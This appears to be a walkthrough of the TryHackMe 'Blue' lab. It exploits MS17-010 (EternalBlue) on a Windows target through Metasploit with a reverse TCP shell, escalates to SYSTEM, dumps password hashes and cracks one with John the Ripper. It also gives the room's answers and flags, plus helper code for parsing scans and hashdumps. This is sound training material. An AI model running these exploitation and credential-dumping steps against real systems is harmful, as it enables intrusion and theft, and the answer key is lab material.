TryHackMe: Blue – Walkthrough

Hi! Welcome to this walkthrough of the Blue room on TryHackMe. In this room we deploy and hack into a Windows machine, leveraging common misconfiguration issues. We will also get some practice with common tools such as Nmap and Metasploit.

Blue Banner

Room URL: https://tryhackme.com/room/blue

I am making these walkthroughs to keep myself motivated to learn cyber security, and to make sure I retain the knowledge gained from THM's rooms. Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.


Task 1: Recon

Let’s get started with some recon!

Questions

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

Let’s get started with some port scanning with nmap.

nmap -sV -sC --script vuln <target ip>

The -sV flag adds version detection, -sC runs the default NSE scripts, and --script vuln additionally runs the vulnerability-detection scripts.

Doing some port scanning

There is a lot to look at! We can see a variety of services running: RPC, NetBIOS, and SMB. In addition we can see a vulnerability: smb-vuln-ms17-010, with CVE number CVE-2017-0143.

Answer: No answer needed

How many ports are open with a port number under 1000?

The first 3 port results have a number under 1000, so the answer is 3.

Answer: 3
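To make the two results above mechanical (count the open ports below 1000 and pull out the NSE scripts that report VULNERABLE), here is an added Python example; it is my own code, not part of the original walkthrough. It parses nmap's normal (human-readable) output. The scan text embedded in it is constructed to resemble the Blue scan and is not the real captured output; the negative script entry is a made-up name.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of nmap normal output, shaped like the Blue scan; it is
# illustrative and not a captured scan.
SAMPLE_NMAP_OUTPUT = """\
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows SMB (constructed)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_example-negative-check: false
"""

# "135/tcp   open  msrpc   Microsoft Windows RPC" -> port, proto, state, service
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# A script header is "| name:" or "|_name:"; indented detail lines have more
# than one space after the bar and therefore do not match.
SCRIPT_HEADER = re.compile(r"^\|(?:_| )([\w.-]+):(.*)$")
# Only a definite "State: VULNERABLE" counts; "NOT VULNERABLE" and
# "LIKELY VULNERABLE" are deliberately excluded.
VULNERABLE_STATE = re.compile(r"State:\s*VULNERABLE\b")
CVE_ID = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_open_ports(scan_text: str) -> List[Tuple[int, str, str]]:
    """Return (port, protocol, service) for every port nmap lists as open."""
    ports = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports.append((int(m.group(1)), m.group(2), m.group(4)))
    return ports


def count_open_ports_below(scan_text: str, limit: int = 1000) -> int:
    """The room's question: how many open ports have a number under limit."""
    return sum(1 for port, _, _ in parse_open_ports(scan_text) if port < limit)


def vulnerable_scripts(scan_text: str) -> Dict[str, List[str]]:
    """Map each NSE script whose output states VULNERABLE to the CVE ids it cites."""
    blocks: Dict[str, List[str]] = {}
    current = None
    for line in scan_text.splitlines():
        m = SCRIPT_HEADER.match(line)
        if m:
            current = m.group(1)
            blocks[current] = [m.group(2)]
        elif current is not None and line.startswith("|"):
            blocks[current].append(line)
        else:
            current = None  # left the script-output section
    findings: Dict[str, List[str]] = {}
    for name, lines in blocks.items():
        body = "\n".join(lines)
        if VULNERABLE_STATE.search(body):
            findings[name] = sorted(set(CVE_ID.findall(body)))
    return findings


if __name__ == "__main__":
    print("open ports below 1000:", count_open_ports_below(SAMPLE_NMAP_OUTPUT))
    for script, cves in vulnerable_scripts(SAMPLE_NMAP_OUTPUT).items():
        print(f"{script}: VULNERABLE, CVEs {', '.join(cves) or 'none listed'}")
```

On the constructed sample the count is 3 (135, 139 and 445) and the only finding is smb-vuln-ms17-010 with CVE-2017-0143, which is exactly what the screenshot above shows; on a real scan, feed it the file saved with nmap's -oN option.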

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

Because of the -sC and --script vuln options we have run some NSE scripts. One of them has discovered that the host is vulnerable to smb-vuln-ms17-010, or ms17-010 for short.

Answer: ms17-010


Task 2: Gain Access

Exploit the machine and gain a foothold.

Questions

Start Metasploit

Well, this is easy enough:

msfconsole

Answer: No answer needed

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Well, we know the name of the exploit, and we want to search for modules of type exploit. So we can enter the following command:

search ms17-010 type:exploit
Searching for ms17–010 exploit modules

Considering the name of this room, I will go with the EternalBlue one.

Answer: exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

This is very often RHOSTS, but let’s have a look. Load the module by entering use 0 (0 being its index in the search results). Then enter show options.

Loading the ms17_010_eternalblue module and showing options

And yes, RHOSTS is required. We normally set it to the target host IP. Do this by running:

set RHOSTS <target IP>

Answer: RHOSTS

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

Set the payload (see above). We don’t always have to do this as Metasploit is usually smart enough to pick a payload.

With that done, run the exploit!

Simply type run or exploit.

Answer: No answer needed

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

We got access:

We got access

Background the shell by pressing Control+Z and move on to task 3.

Answer: No answer needed


Task 3: Escalate

Escalate privileges, learn how to upgrade shells in metasploit.

Questions

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

I did a simple search for shell and found the following module:

Searching for the shell_to_meterpreter module

Answer: post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

Activate the module by entering:

use post/multi/manage/shell_to_meterpreter

Follow this by running show options.

Showing the options for the shell_to_meterpreter module

The answer is SESSION, which is required but not set.

Answer: SESSION

Set the required option, you may need to list all of the sessions to find your target here.

You can use sessions -l to see the id of the shell session. Proceed by setting the SESSION to 1 (set SESSION 1).

Answer: No answer needed

Run! If this doesn’t work, try completing the exploit from the previous task once more.

Enter the run command.

Running the shell_to_meterpreter module

Enter the sessions -l command once more to see that we have an active Meterpreter session:

Active Meterpreter session

It is running on id 2.

Answer: No answer needed

Once the meterpreter shell conversion completes, select that session for use.

Change sessions by writing:

sessions -i 2

Activating the meterpreter session

Answer: No answer needed

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

Let’s run a shell and run whoami. We are indeed system.

Running basic commands

Now background the shell by pressing Control+Z, and select the meterpreter session once more. This is likely still done by running sessions -i 2.

Answer: No answer needed

List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Run the ps command.

Looking at the running processes with ps

Pick a system process. I will select id 2728.

Answer: No answer needed

Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Simply enter migrate 2728 (this might differ on your system).

Migrating to a system process

Migration completed!

Answer: No answer needed


Task 4: Cracking

Dump the non-default user’s password and crack it!

Questions

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Now that we have our elevated shell, run hashdump.

Running hashdump

In case you are wondering, each line of the hashdump output has the following colon-separated fields (followed by three empty fields, hence the trailing :::):

  1. Username (Administrator, User1, etc.)
  2. Relative Identification (RID)
  3. LM hash
  4. NTLM hash
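To show the layout concretely and pick out what a defender would look for in such a dump (the non-default account, whether the weak LM format is still stored, and accounts with an empty hash), here is an added Python example; it is my own code, not from the walkthrough or from Metasploit. The sample dump inside it is constructed: Jon's NT hash is the one shown in this room, but his RID and the Administrator and Guest rows are made up. The two constants are the well-known "no LM hash stored" and "empty password" values.

```python
from dataclasses import dataclass
from typing import List

# Well-known values: the LM field holds this constant when no LM hash is stored
# (the modern default), and this NT value is the hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Built-in accounts (Administrator=500, Guest=501, ...) have RIDs below 1000;
# accounts created on the machine start at 1000.
FIRST_USER_RID = 1000

# Constructed sample in hashdump's user:RID:LM:NT::: layout. Jon's NT hash is
# the one shown in the walkthrough; the RID and the other rows are made up.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


@dataclass
class HashdumpEntry:
    username: str
    rid: int
    lm_hash: str
    nt_hash: str

    @property
    def is_builtin(self) -> bool:
        return self.rid < FIRST_USER_RID

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means the weak, case-insensitive LM format is still enabled.
        return self.lm_hash != EMPTY_LM

    @property
    def blank_password(self) -> bool:
        return self.nt_hash == EMPTY_NT


def parse_hashdump(text: str) -> List[HashdumpEntry]:
    """Parse hashdump lines; the trailing ':::' fields are empty and ignored."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            raise ValueError(f"not a hashdump line: {raw!r}")
        entries.append(HashdumpEntry(fields[0], int(fields[1]),
                                     fields[2].lower(), fields[3].lower()))
    return entries


def non_default_users(entries: List[HashdumpEntry]) -> List[str]:
    """Usernames whose RID marks them as created on the machine, not built in."""
    return [e.username for e in entries if not e.is_builtin]


def review(entries: List[HashdumpEntry]) -> List[str]:
    """One defender-oriented note per account worth attention."""
    notes = []
    for e in entries:
        if e.blank_password:
            notes.append(f"{e.username} (RID {e.rid}) has an empty password hash")
        if e.lm_stored:
            notes.append(f"{e.username} (RID {e.rid}) still has an LM hash stored")
    return notes


if __name__ == "__main__":
    parsed = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default users:", non_default_users(parsed))
    for note in review(parsed):
        print("note:", note)
```

On the sample the only non-default user is Jon, no account still stores an LM hash, and the two built-in accounts carry the empty-password NT value.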

The non-default user is Jon.

Answer: Jon

Copy this password hash to a file and research how to crack it. What is the cracked password?

Copy the hash (ffb43f0de35be4d9917ac0cc8ad57f8d) to a file by running:

echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt

Let’s use John the Ripper to crack it. I first thought the format would be LM, but it is actually nt (john's name for the NTLM hash format).

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This gives us the answer.
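To see what john's nt format actually is, and why such hashes fall to a wordlist in seconds, here is an added Python example; it is my own code, not from the walkthrough or from John the Ripper. It implements MD4 from RFC 1320 in pure Python (hashlib's md4 is frequently unavailable on systems built against OpenSSL 3), builds the NT hash as MD4 over the UTF-16LE encoding of the password, and compares a candidate against a stored hash. The only page-derived value is Jon's hash; the other vectors are the published MD4 test values.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, s: int) -> int:
    """Rotate a 32-bit value left by s bits."""
    return ((x << s) | (x >> (32 - s))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320 (pure Python, little-endian words)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        # Round 1: F = (b AND c) OR (NOT b AND d), message words in order.
        for i in range(16):
            f = (b & c) | (~b & d)
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, _rotl((a + f + x[i]) & MASK32, s), b, c
        # Round 2: majority function, words taken column-wise, constant sqrt(2).
        for i in range(16):
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            s = (3, 5, 9, 13)[i % 4]
            a, b, c, d = d, _rotl((a + g + x[k] + 0x5A827999) & MASK32, s), b, c
        # Round 3: XOR function, bit-reversed word order, constant sqrt(3).
        for i in range(16):
            h = b ^ c ^ d
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            s = (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, _rotl((a + h + x[k] + 0x6ED9EBA1) & MASK32, s), b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK32, (b0 + b) & MASK32,
                          (c0 + c) & MASK32, (d0 + d) & MASK32)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password. Note what is missing: no salt,
    no iteration count, so every candidate costs exactly one MD4 call."""
    return md4(password.encode("utf-16le")).hex()


def candidate_matches(candidate: str, stored_nt_hash: str) -> bool:
    """What a cracker does per wordlist entry: hash it and compare."""
    return nt_hash(candidate) == stored_nt_hash.lower()


# Jon's NT hash as shown in this room.
JON_NT_HASH = "ffb43f0de35be4d9917ac0cc8ad57f8d"

if __name__ == "__main__":
    for pw in ("", "password", "alqfna22"):
        print(f"{pw!r:12} -> {nt_hash(pw)}")
    print("alqfna22 matches Jon's hash:", candidate_matches("alqfna22", JON_NT_HASH))
```

Two things are worth noticing. The NT hash of an empty password is the MD4 of the empty string, which is the 31d6cfe0... value hashdump prints for blank accounts. And because the hash is unsalted and a single fast MD4, a wordlist like rockyou costs one hash per word and identical passwords on different accounts produce identical hashes, which is why the defensive answer is long passphrases rather than any tuning of the hash itself.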

Cracking the password hash with john

Answer: alqfna22


Task 5: Find flags!

Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!

Completed Blue? Check out Ice: Link

You can check out the third box in this series, Blaster, here: Link

Questions

Flag1? This flag can be found at the system root.

Make sure you are still in the meterpreter session. Check your present working directory by entering pwd. We are in the system32 folder inside Windows.

Move up two directories by running cd .. twice.
List the files in the current directory (ls or dir) and finally read the flag by running cat flag1.txt.

Finding the first flag

Answer: flag{access_the_machine}

Flag2? This flag can be found at the location where passwords are stored within Windows.

Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare, however, it can happen.

Windows stores password hashes in the SAM database, which lives in the C:\Windows\System32\config directory. Change to that directory in the meterpreter shell:

cd C:/Windows/System32/config

List the files there and you will find the second flag. Read the flag2.txt:

Finding the second flag

Answer: flag{sam_database_elevated_access}

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

I first thought I had to look into the C:/Users/Administrator folder but this does not exist. But on this system Jon is an administrator, so let’s look there.

Looking at the users directory

If we list all files in the Jon directory we do not see any flag. Let’s go into the Documents folder. And bingo!

Finding the third flag

Answer: flag{admin_documents_can_be_valuable}


We are done!

We are done! This was fun, and if you followed along with the Metasploit rooms on TryHackMe (I have walkthroughs for those as well!) it shouldn’t have been too difficult 🙂

See my walkthroughs here:

TryHackMe: Metasploit: Introduction – Walkthrough

TryHackMe: Metasploit: Exploitation – Walkthrough

TryHackMe: Metasploit Meterpreter – Walkthrough

I hope you got some benefit from this walkthrough.

